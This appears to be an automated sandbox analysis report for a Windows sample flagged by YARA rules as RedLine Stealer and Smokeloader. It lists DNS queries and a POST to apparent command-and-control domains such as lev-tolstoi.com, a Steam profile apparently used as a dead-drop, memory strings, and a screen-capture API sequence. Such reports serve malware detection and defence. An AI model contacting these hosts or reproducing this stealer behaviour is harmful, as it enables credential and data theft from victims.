Source: global traffic	DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic	DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: file.exe, 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/B
Source: file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api$
Source: file.exe, 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiC
Source: file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apisy
Source: file.exe, 00000000.00000003.1274944265.000000000073A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apix
Source: file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiyp
Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/s
Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/ws
Source: file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/x
Source: file.exe, 00000000.00000002.1608203623.0000000000703000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.0000000000703000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: file.exe, 00000000.00000002.1608203623.0000000000703000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/apiocal
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900y
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000003.1274773836.0000000000703000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49714 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00433860 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

0_2_00433860

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1608094313.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1608123380.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_007893AC	0_3_007893AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_007893AC	0_3_007893AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_007893AC	0_3_007893AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_007893AC	0_3_007893AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_007893AC	0_3_007893AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0077215A	0_3_0077215A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D072	0_2_0040D072
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004278A0	0_2_004278A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00424950	0_2_00424950
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00440150	0_2_00440150
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043F130	0_2_0043F130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042D1A4	0_2_0042D1A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A273	0_2_0041A273
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043D29C	0_2_0043D29C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043AB60	0_2_0043AB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043D3F3	0_2_0043D3F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042CB9F	0_2_0042CB9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00422BA0	0_2_00422BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040AC40	0_2_0040AC40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409C1E	0_2_00409C1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043D57C	0_2_0043D57C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004275C0	0_2_004275C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CDC8	0_2_0043CDC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00437DD0	0_2_00437DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043F640	0_2_0043F640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CF41	0_2_0043CF41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B71C	0_2_0040B71C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E7E4	0_2_0040E7E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004087A0	0_2_004087A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00417FB0	0_2_00417FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00416866	0_2_00416866
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041C830	0_2_0041C830
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B030	0_2_0043B030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004250D0	0_2_004250D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00424088	0_2_00424088
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F0A0	0_2_0041F0A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00432940	0_2_00432940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043594A	0_2_0043594A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405950	0_2_00405950
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043F960	0_2_0043F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043D111	0_2_0043D111
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00438910	0_2_00438910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043911E	0_2_0043911E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043092C	0_2_0043092C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004369F3	0_2_004369F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004061B0	0_2_004061B0
